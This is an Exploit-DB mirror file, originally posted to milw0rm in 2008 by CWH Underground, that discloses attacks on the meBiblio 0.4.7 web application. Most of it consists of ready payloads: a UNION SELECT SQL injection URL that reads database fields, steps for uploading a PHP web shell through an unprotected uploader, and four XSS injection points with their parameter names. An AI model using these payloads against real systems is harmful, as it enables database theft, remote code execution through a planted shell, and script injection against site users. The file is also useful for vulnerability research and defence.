exploit-db-mirror/exploits/php/webapps/5716.txt

========================================================================================
 meBiblio 0.4.7 Remote SQL Injection/ Arbitrary File Upload Exploit / XSS Vulnerability
========================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

AUTHOR : CWH Underground
DATE   : 1 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : meBiblio
 VERSION     : 0.4.7 (Lastest Version)
 VENDOR      : http://mebiblio.sourceforge.net/
 DOWNLOAD    : http://downloads.sourceforge.net/mebiblio
#####################################################

---SQL Injection Exploit---

http://[target]/[path]/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2

** You will found PACS_description in Journal Long Name's Box **


---Arbitrary File Upload Exploit---

[Files Directory must existed]

Upload Path: http://[target]/[path]/upload/uploader.html

Shell Script: http://[target]/[path]/files/evil.php


---Multiple Remote XSS Exploit---

[+]dbadd.inc.php
[+]add_journal_mask.inc.php
[+]insert_mask.inc.php
[+]search_mask.inc.php

Example:

http://[target]/[path]/dbadd.inc.php?sql=<XSS>
http://[target]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://[target]/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://[target]/[path]/search_mask.inc.php?LabelYear=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-01]